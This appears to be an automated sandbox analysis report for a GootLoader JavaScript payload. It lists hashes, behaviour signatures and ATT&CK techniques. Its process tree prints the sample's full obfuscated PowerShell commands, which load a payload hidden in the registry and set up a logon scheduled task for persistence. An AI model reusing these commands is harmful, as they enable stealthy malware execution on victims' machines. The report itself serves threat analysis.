fe7b2838f5a5cf6b943301c4087d9f9038bb39eddbb453cd5b419f4e09bc3b7d

General

Target

gootloader-payload.js
Size

507KB
MD5

7f8d06ef42e2c6c948269ce6596269ac
SHA1

ba671f89682e5dd24c714222309a88c0ac89d57c
SHA256

fe7b2838f5a5cf6b943301c4087d9f9038bb39eddbb453cd5b419f4e09bc3b7d
SHA512

9dbaeb23d06aa06f7376027b2766a32ab5c0f0932970f8bfcba4d3258547f9a4bdbf13338fee610d041c1c88c3bcd424b6d3c8abb54636357afe312d6a9e9345
SSDEEP

12288:hC+4odILiIoJUzbxA5ITh8QSm/kqQqvw8Hg38:h14oy/oezbxSITyZ9qQqvpg38

Score

3^/10

Malware Config

Signatures

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
1872	powershell.exe
1472	powershell.exe
1396	powershell.exe
904	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	1472	powershell.exe
Token: SeDebugPrivilege	1872	powershell.exe
Token: SeDebugPrivilege	1396	powershell.exe
Token: SeDebugPrivilege	904	powershell.exe

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 1608 wrote to memory of 1872	1608	wscript.exe	26
PID 1608 wrote to memory of 1872	1608	wscript.exe	26
PID 1608 wrote to memory of 1872	1608	wscript.exe	26
PID 1608 wrote to memory of 1872	1608	wscript.exe	26
PID 1608 wrote to memory of 1472	1608	wscript.exe	27
PID 1608 wrote to memory of 1472	1608	wscript.exe	27
PID 1608 wrote to memory of 1472	1608	wscript.exe	27
PID 1608 wrote to memory of 1472	1608	wscript.exe	27
PID 1872 wrote to memory of 904	1872	powershell.exe	31
PID 1872 wrote to memory of 904	1872	powershell.exe	31
PID 1872 wrote to memory of 904	1872	powershell.exe	31
PID 1872 wrote to memory of 904	1872	powershell.exe	31
PID 1472 wrote to memory of 1396	1472	powershell.exe	30
PID 1472 wrote to memory of 1396	1472	powershell.exe	30
PID 1472 wrote to memory of 1396	1472	powershell.exe	30
PID 1472 wrote to memory of 1396	1472	powershell.exe	30

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\gootloader-payload.js
1⤵
- Suspicious use of WriteProcessMemory
PID:1608
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" /co C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "/"enc" N"A"A"3A"D"kAMwA2ADMAN"gA5ADAAOw"Bz"AGwA"ZQBlAHAA"IAAtAHMAIA"A3"A"DgAO"w"AkAGkAaQBz"AD0ARwB"lAHQ"ALQBJAH"QA"ZQBt"AFAAcgBvAHA"AZ"Q"ByAHQAeQAgAC0A"cABhAHQAaAAgACgAIg"B"oAGsAIg"A"r"ACIA"Y"wB1"ADoAXAB"z"AG8A"ZgAi"A"C"s"AIg"B0AH"cAIg"ArA"CI"AYQByA"GUAX"ABt"A"GkA"YwA"iACsA"IgByAG"8Acw"Ai"ACsAI"gBvAGYAdA"BcAFA"A"ZQBy"AC"IA"KwAiA"HMAbwBuAG"EAbAB"p"A"H"oAIgArACIAYQ"B0A"Gk"AbwBuAFwAIgA"r"AF"sARQB"uAHYA"aQ"ByA"G8Ab"gB"tA"GUAb"gB0AF0AOgA6A"C"gAIgB1"A"H"MA"Z"QAiA"C"sA"Ig"By"AG4AI"g"ArA"C"IA"YQBt"A"G"U"A"IgAp"A"Cs"AI"g"A"wACIAK"QA"7AGY"AbwByACAA"KAAkAG"MAbQA9"ADAA"Ow"Ak"A"G"MA"bQAgAC"0A"bA"BlACAAOAAwADA"AOwAkAGMAb"QArACsAK"QB7"AF"QAcgB"5A"HsAJAB2"AGQAKwA9"ACQ"AaQBpAHM"ALgAkAGMAbQ"B9AE"MAY"QB0AGM"AaAB7AH0A"f"Q"A7ACQAYwB"t"AD0AMAA7AHcAaAB"pAGwAZQA"oACQAd"AByA"HU"AZQApA"HsAJABj"A"G"0"AKwArADsAJ"A"BrA"G8"APQBbAG0AYQ"B0A"G"gAXQA"6ADoA"KAAiAHMAcQA"iACs"AIg"By"AHQAIg"ApA"Cg"AJA"BjA"G0AKQ"A"7AGkAZgAo"ACQAaw"BvACAAL"QBl"AHE"AIAAxADAAMA"AwA"CkAewB"i"AHIAZ"QBhAGsAfQ"B9"ACQAegBlAGwAPQAkAH"YAZAAuA"HIAZQBw"AG"wA"YQBjA"GUAK"AAi"ACMA"Ig"As"ACQAawBv"ACkAOwAkAHoAeQB1"AD0AWwB"iAHkA"dABl"AFsAX"Q"BdADoAOgAoA"C"I"AbgB"lA"CIAK"wA"iAHcA"IgApACgAJAB6AGUAbA"AuAE"wA"ZQBuAGcAdABoAC8AMgA"pADsAZgBvA"H"IAKAAkAGMAbQ"A9ADAA"OwAkAG"M"AbQAgAC0Ab"A"B0A"CAAJAB6AGUAbAAuA"Ew"AZ"QB"uAGcAdA"BoAD"sA"JABjAG0AKwA9ADIA"K"Q"B7"ACQAe"gB5"A"HU"AWwAkA"G"MAbQAvADIA"XQ"A9AFs"AYwB"vAG4AdgBlA"HIAdABdADoAOgAoACIAV"ABvAEIAIgArACIAeQB0AG"UAIg"ApAC"gAJAB6AGUAbA"A"uA"FMAdQ"Bi"A"HMA"dAByAGkAbgBnA"Cg"AJABjAG0"ALAAy"ACkALAAoADIA"KgA4AC"kAKQB9AFsAc"gBlAGYA"b"ABlAGM"Ad"ABp"AG8AbgA"uAGEA"cwB"zAGUAbQ"B"iAG"wAeQB"d"A"D"oA"OgAo"AC"I"ATABvAC"IAKwAi"AGEAZAAiAC"kA"KA"A"kAHoAeQB1ACkA"O"w"BbAE8AcABlAG4"AXQA6ADoA"K"AA"iAFQAZQAiA"C"sAIg"BzAHQA"Ig"ApACg"AKQA7A"DUA"N"gA0AD"gAMQ"A0ADMAMQ"A1ADsA"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1872
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" /enc NAA3ADkAMwA2ADMANgA5ADAAOwBzAGwAZQBlAHAAIAAtAHMAIAA3ADgAOwAkAGkAaQBzAD0ARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AcABhAHQAaAAgACgAIgBoAGsAIgArACIAYwB1ADoAXABzAG8AZgAiACsAIgB0AHcAIgArACIAYQByAGUAXABtAGkAYwAiACsAIgByAG8AcwAiACsAIgBvAGYAdABcAFAAZQByACIAKwAiAHMAbwBuAGEAbABpAHoAIgArACIAYQB0AGkAbwBuAFwAIgArAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6ACgAIgB1AHMAZQAiACsAIgByAG4AIgArACIAYQBtAGUAIgApACsAIgAwACIAKQA7AGYAbwByACAAKAAkAGMAbQA9ADAAOwAkAGMAbQAgAC0AbABlACAAOAAwADAAOwAkAGMAbQArACsAKQB7AFQAcgB5AHsAJAB2AGQAKwA9ACQAaQBpAHMALgAkAGMAbQB9AEMAYQB0AGMAaAB7AH0AfQA7ACQAYwBtAD0AMAA7AHcAaABpAGwAZQAoACQAdAByAHUAZQApAHsAJABjAG0AKwArADsAJABrAG8APQBbAG0AYQB0AGgAXQA6ADoAKAAiAHMAcQAiACsAIgByAHQAIgApACgAJABjAG0AKQA7AGkAZgAoACQAawBvACAALQBlAHEAIAAxADAAMAAwACkAewBiAHIAZQBhAGsAfQB9ACQAegBlAGwAPQAkAHYAZAAuAHIAZQBwAGwAYQBjAGUAKAAiACMAIgAsACQAawBvACkAOwAkAHoAeQB1AD0AWwBiAHkAdABlAFsAXQBdADoAOgAoACIAbgBlACIAKwAiAHcAIgApACgAJAB6AGUAbAAuAEwAZQBuAGcAdABoAC8AMgApADsAZgBvAHIAKAAkAGMAbQA9ADAAOwAkAGMAbQAgAC0AbAB0ACAAJAB6AGUAbAAuAEwAZQBuAGcAdABoADsAJABjAG0AKwA9ADIAKQB7ACQAegB5AHUAWwAkAGMAbQAvADIAXQA9AFsAYwBvAG4AdgBlAHIAdABdADoAOgAoACIAVABvAEIAIgArACIAeQB0AGUAIgApACgAJAB6AGUAbAAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABjAG0ALAAyACkALAAoADIAKgA4ACkAKQB9AFsAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvACIAKwAiAGEAZAAiACkAKAAkAHoAeQB1ACkAOwBbAE8AcABlAG4AXQA6ADoAKAAiAFQAZQAiACsAIgBzAHQAIgApACgAKQA7ADUANgA0ADgAMQA0ADMAMQA1ADsA
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:904
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" /co C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "/"enc" NQA3ADgA"O"A"A4A"DMANQA4AD"gAOw"A"kA"G4A"e"A"A"9ACg"AWw"BEA"Gk"AYQBnA"G4"Ab"wBzA"HQAaQBjA"HM"ALgBQAHIAb"w"BjA"G"U"AcwBzAF0AOgA6A"E"cA"ZQ"B0"AEM"AdQB"yAHIAZ"QBuAHQA"UAByA"G8AYwB"lAHMAc"wAoA"CkALgBNAG"E"Aa"QBuA"E0"A"bwBkAH"UAbABlAC4A"RgBpA"GwA"Z"QB"OAGE"A"bQBlAC"kAOwAk"AHYAbQBwAD0A"IgAt"AHcAIABoAC"AA"Lw"BjA"C"AAIgArACQ"AbgB"4A"C"sAIgAgACIAIgAvACIAI"gBlACIAIgAg"A"E"4AQQBBADMAQ"QBEAGsAQQBNAHcAQQAyAEEARABNAE"EATgBnA"EEANQB"BAEQ"AQ"QBBAE8"AdwBCA"Ho"AQQB"HAHcAQ"Q"BaAFEAQgBsA"EE"AS"ABBAEE"ASQB"BAEEA"dABBAEgATQBB"A"E"kAQ"QBB"ADMAQQB"EAGcAQQBP"A"HcAQQBrA"EEARwBrAEEAYQBR"A"EIAeg"BBA"E"Q"AMABBAF"IAdwBCA"GwAQ"QBI"AF"EA"QQ"BM"AFEAQgBKAEEASABRAEEAWgB"RAEIA"dABBAEYAQQBBAGMAZw"B"CA"HYAQQBIAEEA"QQBa"AF"EAQgB5AEEA"SA"BRAEEAZQ"BRAEE"A"Z"wBB"A"EMA"MABBAGM"AQQ"BCA"GgAQ"QBIAFEA"Q"QBhAEEAQQ"B"nAEEAQwBnAEEASQBnAEIAb"wBBA"Ec"AcwBBAEkAZwB"B"AHI"AQQB"D"AE"k"AQQ"BZAHcA"QgAxAEEARABvAEEAWABBA"E"I"A"egBBAEcAOABBAFoAZwBBAG"kAQQ"BDAH"M"A"QQBJAGcAQgAw"AEEA"SAB"jAEEASQ"BnAEEAcgB"BAEM"A"SQBBAF"kA"UQBCA"HkAQQ"B"HAFUAQQBY"AEEAQgB"0A"EEARw"Br"AEE"AW"QB"3"AEEAaQB"BAE"MAcwBBAEk"AZwBCAH"kAQQBHADgAQ"QBjAHc"AQQBp"AEEA"Q"wBzAEE"A"S"QBn"A"EIAd"gB"BAEcAW"Q"B"BAGQAQ"QBCAGM"A"QQ"BGAEEAQQBaA"FEAQ"gB"5"AEEA"QwBJ"AE"EASwB3AE"EAa"Q"BBAEgATQBBA"GIAd"wBCA"HUAQQBHAEUAQQBiAEEA"Q"g"Bw"AEEASA"BvA"EEASQ"BnAE"EAcgBBAEM"ASQBBAFkAUQBCA"DAAQ"QBHAGs"AQQB"iA"H"cAQgB1AEEARgB3"AE"EASQB"nAEE"Acg"B"BA"EY"A"cw"BBAFIAUQB"C"AHU"AQQ"BI"A"F"k"AQQ"Bh"AF"EAQgB5AEE"ARw"A4A"EEA"YgBnAEIAdABBAEcAVQBBA"GIAZwB"CA"DAAQQBGADAA"QQBPAGcAQ"QA2AEE"AQwBnAE"EAS"QB"nAEI"AMQBBAEgATQBBAFo"AUQB"BAGkAQQBDAHM"AQ"QB"JAGcAQg"B5"A"E"E"ARw"A"0AEEA"S"QBn"AEEAcgB"BAEMAS"QBBAFkAUQBCA"H"QAQ"QBHAFUAQQBJ"AGcAQQBwAEEAQwBzA"EEA"SQBn"AE"EA"d"wBBA"EMASQBBAEsAUQBBA"D"cAQQ"BHA"FkA"QQ"BiAH"cAQgB5AEEAQ"w"BBAEE"AS"wBBAEEAa"wBBA"EcATQBBA"GIAUQBB"A"D"kAQ"QB"EAEEAQQBPAHcAQQBr"A"EEARwBNAEEAYgBRA"EE"AZwBBA"EMAM"ABBA"GIA"QQBCAGwAQQBDA"EEAQQBP"AEE"AQQB3AEE"ARABBAEEAT"w"B3"AEEA"awBBAEcA"TQBBA"GIAUQBBAH"I"AQQB"DAH"M"AQQB"LAFE"AQg"A3AEEAR"gB"R"AE"EAYwBnAE"IANQBBAEgAc"wBBAEoA"QQBCADIAQQBHAFEA"QQBLAHcAQ"QA5"AE"EAQwBRA"EEAYQ"B"RAEIAc"ABBAE"gAT"QBBA"EwAZw"BBAGsAQ"QBH"AE0A"QQBiAFEAQgA5AEEARQBNAEEA"WQBRAEIAMABBAEcAT"QBB"AG"EAQQ"BCADcA"Q"Q"BI"A"D"AAQQBmAF"EAQQ"A3A"E"E"AQwB"RAEEAW"QB3AEIAd"ABBAEQ"AM"ABB"AE0AQQBBADcA"QQBIA"GMA"QQBhAEE"A"Qg"BwAEE"ARwB3A"EEAWgBRA"EEAb"w"B"B"AEM"AUQB"BAG"QAQQBCAH"kAQQBIAFUAQ"QBaA"FE"A"Q"QBwA"EEASA"Bz"AEEAS"gBBA"EIA"agBBA"EcAMABBAEs"Ad"w"BBAHIAQQBEAHMAQQBK"A"E"EAQgByAEEARwA4AEEAU"ABR"A"EIAYgB"BA"Ec"AMAB"BAFkAUQB"C"ADAAQQBHAGcAQQBYAFEAQQA2"AEEA"RA"BvAEEASw"BBA"EEAaQ"BBAEgATQBBAGMAU"QBBAG"kAQQBDAHMAQ"QBJAGcAQg"B5"AEEAS"ABRA"EEASQBnA"EEAcABB"AEMAZwBBA"Eo"AQQBCAGo"A"Q"QBHAD"A"A"QQBL"AFEAQQA3AEE"AR"wBrAEEAWgBn"AEEAbw"BB"A"E"MA"U"Q"BBAGEAdwBC"AH"Y"AQQB"DAE"E"AQ"Q"BMA"F"EAQgBsAEE"A"S"ABF"AE"EASQBBAEEAeABB"A"EQA"QQ"BB"A"E0"AQQBBAHcAQQBDAGs"AQQ"BlAHcAQgBpAE"EASA"BJAEEAWgBR"AEIA"aABBAEcAcwBB"AGYA"UQBCAD"k"AQQBDAF"EAQQBl"AGc"AQgBsAE"EARwB3AEEAUAB"RAEEAawBBAE"gAWQBBA"FoAQQBBAHUA"QQBIAEkAQQBa"AFEAQg"B3AEEA"R"wB3AEE"AWQB"RAE"IA"agB"BAEc"A"VQ"BBA"E"sA"QQ"BB"AGkAQQ"BDA"E0AQ"Q"BJ"A"Gc"AQQBzAEEAQwBRAEEAYQB3A"EI"Ad"gBBAEMA"awBBAE8AdwBBA"GsA"QQBIAG8AQ"QBlAF"EAQ"g"A"xA"EEARAAwAEEAV"wB3AEIAaQBBAEgAawB"BAGQAQ"QBCAG"wAQ"QB"GAHMA"QQB"YAFEAQgBkAE"EA"RA"B"v"AEEATwB"nAEEAbwBBA"EMASQ"BBAG"IAZwBCAGwAQQBDAEkAQQBLAH"cAQ"QBp"AEEASABjA"EE"AS"QBnA"EEAcABBAEMA"ZwBBAE"oA"QQ"BC"ADY"A"QQBHAFUA"QQ"BiAEEAQ"Q"B1A"EEARQB3AEEAWg"BRA"EIA"dQ"BBAEcAYwBB"AG"QAQQBCAG8AQQB"DA"DgAQQBN"A"G"c"AQQB"wA"EE"ARABzAEEAWgBnAEI"AdgBBA"E"gASQBBAEsAQ"QBB"AGsA"Q"QBHAE"0AQQ"BiAFEAQQA5AEEARABBAE"EA"T"wB3A"EEAawB"BAE"cAT"QBB"AGI"AUQBBAG"cAQQB"DADAAQQ"Bi"A"EEAQgAwAEEAQ"wBBAEEASgB"BAEIANgBBAEcAVQBBAGIAQQ"BBAHUAQQBF"A"HcAQQ"Ba"A"FEAQgB1AEEARwBjA"EEAZ"A"BBAEI"Ab"wBBA"EQAcw"BBAE"oAQ"QBCAGoAQQBHA"DAAQQB"LAHcAQQ"A5"AEEARABJAEEAS"wB"RAEI"ANw"BBA"EMAUQBBAGU"AZ"wBCA"DUAQQBIAF"UAQ"QBXA"HcAQQB"rAEEARw"BN"AEEAY"g"BRAEEAdg"B"B"AEQA"S"QBBA"FgAU"QBBADkAQQBG"AHM"AQQBZAHcAQg"B2AEEA"R"wA0"AEEAZABnA"EIAbA"B"BAEg"A"S"Q"B"BAGQAQQ"BCAG"QA"QQBE"A"G"8AQQBPAGcAQQBvAEEAQ"wBJ"AEEA"VgBBAEIA"dgBBAEU"ASQBBAEkAZwBBAHIA"Q"QBDAEkAQ"QBlAFEAQgAwAE"EAR"wBVAE"EAS"QBnA"EEAcABB"AE"MAZwBBAEoAQQBCADYAQQB"HAFUA"QQBiAEEAQ"QB"1A"E"EARg"BNAE"EAZAB"R"A"EIAa"QBBAEgATQ"BBAGQAQQBC"AHk"AQ"QBHAGsA"QQBi"AG"cAQ"gB"u"AEEAQw"BnAE"EA"SgBBAEI"Aa"gBBAEcAMABBAEwA"QQB"BAH"k"AQ"QBD"A"GsAQQ"BMAEEA"Q"QBv"A"EEAR"A"B"JA"E"EAS"wBnA"EEANABBAEMA"aw"BB"AEs"A"UQ"BCAD"k"AQQ"BG"AHMAQQBjAGcAQgBsAEEARwBZAEEAYgBBAEIAbABBAEcATQB"BA"GQAQQBCAHAA"Q"QBHADgAQ"QBiA"GcAQQ"B1AE"EARwBFAEEAY"wB3AE"IAeg"BBAE"cAV"QBBA"G"I"AUQB"CAG"k"AQQ"BHAHcAQQB"lAFEA"Q"gBkAE"EA"R"ABvAEEATwBnA"E"EAb"w"BBAEM"ASQBBAFQA"QQBCA"HYAQ"QBDAEkAQ"QBLAHcA"QQBpAEE"ARwBFAE"EAW"gBBAE"EAaQBB"AE"MAawB"BAEsAQQBBA"GsAQQBIAG"8AQQBlAFEA"Qg"AxA"EEAQwB"r"AEEATwB3"A"EIAYgBBAEUAOAB"BAGMAQQBCAG"w"AQ"Q"BHADQA"QQB"Y"A"F"EA"QQA2"A"EEARABvAEEASwBB"AEEAaQBBAEYAUQB"BAFo"AUQ"BB"A"GkAQQBDA"HMAQQBJAGcAQgB6"AEEASABRAEEASQBn"AEEAcABBAEM"A"Z"wBB"AEsAUQ"B"BA"D"cAQQ"BEA"FUA"Q"QBOAGcAQQAwA"EEARABnAEEATQBRAEEAMABB"AEQATQBBAE0"A"UQBBADE"AQQBEAHMAQQ"AiADsA"JA"B"4AHEAe"gA9"ACQA"ZQBuAHY"AO"gBVAFMARQBSAE4"AQQBNAE"UAO"wBSAGUA"ZwBpAHMAdABlAH"IA"LQBTAGMAaAB"lAGQ"A"d"Q"BsAG"UA"ZABU"AGEAcwBrAC"AAJAB4AHEAegAgAC0ASQBu"ACAA"KA"BOA"G"U"A"dwAtAFMAYwBoAGUA"Z"A"B1AG"w"AZQB"kAFQAY"QBzAGsAIAAtAEE"A"YwAgACg"AT"gBlAHcAL"QBTAG"MA"aA"B"lAGQAd"QBs"AGUAZ"ABUAG"EAcwBrAEEAYwB0AGkA"bwBuA"CAALQBF"ACAAJAB"uAH"gAIA"AtAEEAcgAgACQAdgBtAHAAKQAgAC0AV"ABy"ACAA"KA"BO"AGUAdwAtAFM"AYwBoAGUAZAB1AG"w"A"Z"QBkAFQA"YQ"BzAG"sAVABy"A"GkAZwB"nAGU"A"cgAgA"C"0AQQB0AEwAIAAtAF"UAIA"A"kAHgA"cQB"6AC"kAK"Q"A7ADgAM"QA"1ADkANwA3ADI"A"Nw"A0ADs"A
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1472
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" /enc NQA3ADgAOAA4ADMANQA4ADgAOwAkAG4AeAA9ACgAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAUAByAG8AYwBlAHMAcwAoACkALgBNAGEAaQBuAE0AbwBkAHUAbABlAC4ARgBpAGwAZQBOAGEAbQBlACkAOwAkAHYAbQBwAD0AIgAtAHcAIABoACAALwBjACAAIgArACQAbgB4ACsAIgAgACIAIgAvACIAIgBlACIAIgAgAE4AQQBBADMAQQBEAGsAQQBNAHcAQQAyAEEARABNAEEATgBnAEEANQBBAEQAQQBBAE8AdwBCAHoAQQBHAHcAQQBaAFEAQgBsAEEASABBAEEASQBBAEEAdABBAEgATQBBAEkAQQBBADMAQQBEAGcAQQBPAHcAQQBrAEEARwBrAEEAYQBRAEIAegBBAEQAMABBAFIAdwBCAGwAQQBIAFEAQQBMAFEAQgBKAEEASABRAEEAWgBRAEIAdABBAEYAQQBBAGMAZwBCAHYAQQBIAEEAQQBaAFEAQgB5AEEASABRAEEAZQBRAEEAZwBBAEMAMABBAGMAQQBCAGgAQQBIAFEAQQBhAEEAQQBnAEEAQwBnAEEASQBnAEIAbwBBAEcAcwBBAEkAZwBBAHIAQQBDAEkAQQBZAHcAQgAxAEEARABvAEEAWABBAEIAegBBAEcAOABBAFoAZwBBAGkAQQBDAHMAQQBJAGcAQgAwAEEASABjAEEASQBnAEEAcgBBAEMASQBBAFkAUQBCAHkAQQBHAFUAQQBYAEEAQgB0AEEARwBrAEEAWQB3AEEAaQBBAEMAcwBBAEkAZwBCAHkAQQBHADgAQQBjAHcAQQBpAEEAQwBzAEEASQBnAEIAdgBBAEcAWQBBAGQAQQBCAGMAQQBGAEEAQQBaAFEAQgB5AEEAQwBJAEEASwB3AEEAaQBBAEgATQBBAGIAdwBCAHUAQQBHAEUAQQBiAEEAQgBwAEEASABvAEEASQBnAEEAcgBBAEMASQBBAFkAUQBCADAAQQBHAGsAQQBiAHcAQgB1AEEARgB3AEEASQBnAEEAcgBBAEYAcwBBAFIAUQBCAHUAQQBIAFkAQQBhAFEAQgB5AEEARwA4AEEAYgBnAEIAdABBAEcAVQBBAGIAZwBCADAAQQBGADAAQQBPAGcAQQA2AEEAQwBnAEEASQBnAEIAMQBBAEgATQBBAFoAUQBBAGkAQQBDAHMAQQBJAGcAQgB5AEEARwA0AEEASQBnAEEAcgBBAEMASQBBAFkAUQBCAHQAQQBHAFUAQQBJAGcAQQBwAEEAQwBzAEEASQBnAEEAdwBBAEMASQBBAEsAUQBBADcAQQBHAFkAQQBiAHcAQgB5AEEAQwBBAEEASwBBAEEAawBBAEcATQBBAGIAUQBBADkAQQBEAEEAQQBPAHcAQQBrAEEARwBNAEEAYgBRAEEAZwBBAEMAMABBAGIAQQBCAGwAQQBDAEEAQQBPAEEAQQB3AEEARABBAEEATwB3AEEAawBBAEcATQBBAGIAUQBBAHIAQQBDAHMAQQBLAFEAQgA3AEEARgBRAEEAYwBnAEIANQBBAEgAcwBBAEoAQQBCADIAQQBHAFEAQQBLAHcAQQA5AEEAQwBRAEEAYQBRAEIAcABBAEgATQBBAEwAZwBBAGsAQQBHAE0AQQBiAFEAQgA5AEEARQBNAEEAWQBRAEIAMABBAEcATQBBAGEAQQBCADcAQQBIADAAQQBmAFEAQQA3AEEAQwBRAEEAWQB3AEIAdABBAEQAMABBAE0AQQBBADcAQQBIAGMAQQBhAEEAQgBwAEEARwB3AEEAWgBRAEEAbwBBAEMAUQBBAGQAQQBCAHkAQQBIAFUAQQBaAFEAQQBwAEEASABzAEEASgBBAEIAagBBAEcAMABBAEsAdwBBAHIAQQBEAHMAQQBKAEEAQgByAEEARwA4AEEAUABRAEIAYgBBAEcAMABBAFkAUQBCADAAQQBHAGcAQQBYAFEAQQA2AEEARABvAEEASwBBAEEAaQBBAEgATQBBAGMAUQBBAGkAQQBDAHMAQQBJAGcAQgB5AEEASABRAEEASQBnAEEAcABBAEMAZwBBAEoAQQBCAGoAQQBHADAAQQBLAFEAQQA3AEEARwBrAEEAWgBnAEEAbwBBAEMAUQBBAGEAdwBCAHYAQQBDAEEAQQBMAFEAQgBsAEEASABFAEEASQBBAEEAeABBAEQAQQBBAE0AQQBBAHcAQQBDAGsAQQBlAHcAQgBpAEEASABJAEEAWgBRAEIAaABBAEcAcwBBAGYAUQBCADkAQQBDAFEAQQBlAGcAQgBsAEEARwB3AEEAUABRAEEAawBBAEgAWQBBAFoAQQBBAHUAQQBIAEkAQQBaAFEAQgB3AEEARwB3AEEAWQBRAEIAagBBAEcAVQBBAEsAQQBBAGkAQQBDAE0AQQBJAGcAQQBzAEEAQwBRAEEAYQB3AEIAdgBBAEMAawBBAE8AdwBBAGsAQQBIAG8AQQBlAFEAQgAxAEEARAAwAEEAVwB3AEIAaQBBAEgAawBBAGQAQQBCAGwAQQBGAHMAQQBYAFEAQgBkAEEARABvAEEATwBnAEEAbwBBAEMASQBBAGIAZwBCAGwAQQBDAEkAQQBLAHcAQQBpAEEASABjAEEASQBnAEEAcABBAEMAZwBBAEoAQQBCADYAQQBHAFUAQQBiAEEAQQB1AEEARQB3AEEAWgBRAEIAdQBBAEcAYwBBAGQAQQBCAG8AQQBDADgAQQBNAGcAQQBwAEEARABzAEEAWgBnAEIAdgBBAEgASQBBAEsAQQBBAGsAQQBHAE0AQQBiAFEAQQA5AEEARABBAEEATwB3AEEAawBBAEcATQBBAGIAUQBBAGcAQQBDADAAQQBiAEEAQgAwAEEAQwBBAEEASgBBAEIANgBBAEcAVQBBAGIAQQBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEQAcwBBAEoAQQBCAGoAQQBHADAAQQBLAHcAQQA5AEEARABJAEEASwBRAEIANwBBAEMAUQBBAGUAZwBCADUAQQBIAFUAQQBXAHcAQQBrAEEARwBNAEEAYgBRAEEAdgBBAEQASQBBAFgAUQBBADkAQQBGAHMAQQBZAHcAQgB2AEEARwA0AEEAZABnAEIAbABBAEgASQBBAGQAQQBCAGQAQQBEAG8AQQBPAGcAQQBvAEEAQwBJAEEAVgBBAEIAdgBBAEUASQBBAEkAZwBBAHIAQQBDAEkAQQBlAFEAQgAwAEEARwBVAEEASQBnAEEAcABBAEMAZwBBAEoAQQBCADYAQQBHAFUAQQBiAEEAQQB1AEEARgBNAEEAZABRAEIAaQBBAEgATQBBAGQAQQBCAHkAQQBHAGsAQQBiAGcAQgBuAEEAQwBnAEEASgBBAEIAagBBAEcAMABBAEwAQQBBAHkAQQBDAGsAQQBMAEEAQQBvAEEARABJAEEASwBnAEEANABBAEMAawBBAEsAUQBCADkAQQBGAHMAQQBjAGcAQgBsAEEARwBZAEEAYgBBAEIAbABBAEcATQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQQB1AEEARwBFAEEAYwB3AEIAegBBAEcAVQBBAGIAUQBCAGkAQQBHAHcAQQBlAFEAQgBkAEEARABvAEEATwBnAEEAbwBBAEMASQBBAFQAQQBCAHYAQQBDAEkAQQBLAHcAQQBpAEEARwBFAEEAWgBBAEEAaQBBAEMAawBBAEsAQQBBAGsAQQBIAG8AQQBlAFEAQgAxAEEAQwBrAEEATwB3AEIAYgBBAEUAOABBAGMAQQBCAGwAQQBHADQAQQBYAFEAQQA2AEEARABvAEEASwBBAEEAaQBBAEYAUQBBAFoAUQBBAGkAQQBDAHMAQQBJAGcAQgB6AEEASABRAEEASQBnAEEAcABBAEMAZwBBAEsAUQBBADcAQQBEAFUAQQBOAGcAQQAwAEEARABnAEEATQBRAEEAMABBAEQATQBBAE0AUQBBADEAQQBEAHMAQQAiADsAJAB4AHEAegA9ACQAZQBuAHYAOgBVAFMARQBSAE4AQQBNAEUAOwBSAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAAJAB4AHEAegAgAC0ASQBuACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAAtAEEAYwAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFACAAJABuAHgAIAAtAEEAcgAgACQAdgBtAHAAKQAgAC0AVAByACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAVAByAGkAZwBnAGUAcgAgAC0AQQB0AEwAIAAtAFUAIAAkAHgAcQB6ACkAKQA7ADgAMQA1ADkANwA3ADIANwA0ADsA
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1396

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
81aecf4db2cfc5686a602386810d7e6c

SHA1
71ab78d6d196781d5e579c5d1e1072f940157b68

SHA256
